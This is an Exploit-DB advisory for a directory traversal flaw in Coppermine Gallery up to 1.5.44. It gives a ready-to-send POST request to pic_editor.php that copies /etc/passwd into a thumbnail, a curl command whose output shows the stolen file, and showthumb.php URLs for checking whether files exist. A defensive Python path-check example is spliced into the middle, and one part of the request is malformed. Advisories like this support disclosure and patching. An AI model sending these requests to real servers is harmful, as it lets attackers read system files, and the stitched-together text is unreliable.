Coppermine Gallery < 1.5.44 - Directory Traversal

  • Author: Hacker Fantastic
    Date: 2017-02-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41876/
  • Coppermine Gallery <= 1.5.44 directory traversal vulnerability
    ==============================================================
    Coppermine is a multi-purpose, fully-featured and integrated web
    picture gallery script written in PHP, using GD or ImageMagick as
    the image library with a MySQL backend. A directory traversal vuln
    exists within the "save_thumb" function of the "crop & rotate"
    image feature. This can be accessed from pic_editor.php. First
    upload a file, e.g. "hackerhouse.png", to an album. This will
    create a predictable file path location containing your userid, e.g.:
    
    http://target/cpg15x/albums/userpics/10001/hackerhouse.png
    
    You will then send a POST request to pic_editor.php to manipulate
    this file, but replace the "newimage" value with the filepath you
    want to read, such as "../../../../../etc/passwd". That file
    will then be copied to a predictable path location as the thumb:
    
    http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
    
    To exploit this vulnerability you will need to be able to
    register an account and upload files to a photo album. You
    do not need admin rights to exploit this flaw. All versions
    from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
    to this flaw. The coppermine configuration was tested with
    ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.
    
    To protect against this exploit do not allow public registration
    requests and only allow trusted users to modify images.
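    As an added example that is not part of this advisory or of Coppermine's own code, the Python below shows the containment check that the "save_thumb" handling lacks: resolve "img_dir" and "newimage" with realpath and refuse anything that lands outside the album directory, so a "../../etc/passwd" value (or an uploaded symlink) can never be copied to the thumb location. The webroot layout, the temporary directory and the function names are assumptions for illustration.

```python
import os
import tempfile
from typing import Optional


def resolve_album_file(webroot: str, img_dir: str, newimage: str) -> Optional[str]:
    """Return the absolute path of newimage inside webroot/img_dir, or None
    when the request would escape the album directory."""
    # The legitimate value is a bare file name such as "hackerhouse.png";
    # anything containing a separator or NUL is rejected outright.
    if not newimage or any(c in newimage for c in "/\\\x00"):
        return None
    root = os.path.realpath(webroot)
    album = os.path.realpath(os.path.join(root, img_dir))
    candidate = os.path.realpath(os.path.join(album, newimage))
    # realpath() has already collapsed ".." and followed symlinks, so a
    # containment test on the result catches traversal in img_dir or
    # newimage as well as a symlink pointing outside the album.
    for inner, outer in ((album, root), (candidate, album)):
        if os.path.commonpath([outer, inner]) != outer:
            return None
    return candidate


def thumb_path(webroot: str, img_dir: str, newimage: str) -> Optional[str]:
    """Destination the gallery would write: thumb_<name> beside the source."""
    src = resolve_album_file(webroot, img_dir, newimage)
    if src is None:
        return None
    folder, name = os.path.split(src)
    return os.path.join(folder, "thumb_" + name)


def demo() -> dict:
    """Constructed webroot: one album with an upload and a stray symlink."""
    root = tempfile.mkdtemp()
    album = os.path.join(root, "albums", "edit")
    os.makedirs(album)
    with open(os.path.join(album, "hackerhouse.png"), "wb") as f:
        f.write(b"\x89PNG")  # placeholder upload content
    outside = os.path.join(root, "secret.txt")  # file outside the album
    open(outside, "w").close()
    os.symlink(outside, os.path.join(album, "link.png"))
    return {
        "upload": resolve_album_file(root, "albums/edit/", "hackerhouse.png"),
        "traversal": resolve_album_file(root, "albums/edit/", "../../../../../etc/passwd"),
        "bad_dir": resolve_album_file(root, "../../etc/", "passwd"),
        "symlink": resolve_album_file(root, "albums/edit/", "link.png"),
        "thumb": thumb_path(root, "albums/edit/", "hackerhouse.png"),
    }
```

    The same check belongs in front of every file operation that takes "img_dir" or a file name from the request, including the "showthumb.php" picfile parameter mentioned below.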
    
    Example POST request
    ====================
    POST /cpg15x/pic_editor.php HTTP/1.1
    Host: target
    Content-Length: 802
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
    Accept: text/html,
    Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
    Cookie: <cookies>
    DNT: 1
    Connection: close
    
    ------WebKitFormBoundaryAE29AdEqShlpLpDF
    Content-Disposition: form-data; name="clipval"
    
    10
    ------WebKitFormBoundaryAE29AdEqShlpLpDF
    Content-Disposition: form-data; name="newimage"
    
    ../../../../../../../../../../../../../../etc/passwd
    ------WebKitFormBoundaryAE29AdEqShlpLpDF
    Content-Disposition: form-data; name="img_dir"
    
    albums/edit/
    ------WebKitFormBoundaryAE29AdEqShlpLpDF
    Content-Disposition: form-data; name="id"
    
    1
    ------WebKitFormBoundaryAE29AdEqShlpLpDF
    Content-Disposition: form-data; name="angle"
    
    45
    ------WebKitFormBoundaryAE29AdEqShlpLpDF
    100
    ------WebKitFormBoundaryAE29AdEqShlpLpDF
    Content-Disposition: form-data; name="save_thumb"
     
     Save as thumbnail 
    ------WebKitFormBoundaryAE29AdEqShlpLpDF-- 
    
    Example file download request
    =============================
    $ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png 
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    ... snip
    
    An additional directory traversal vulnerability is present
    in "showthumb.php", which can be used to stat() for the existence
    of files by reviewing the error returned. You must have
    sufficient rights to use this feature, however.
    
    /cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
    /cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile
    
    -- Hacker Fantastic
     (http://www.myhackerhouse.com)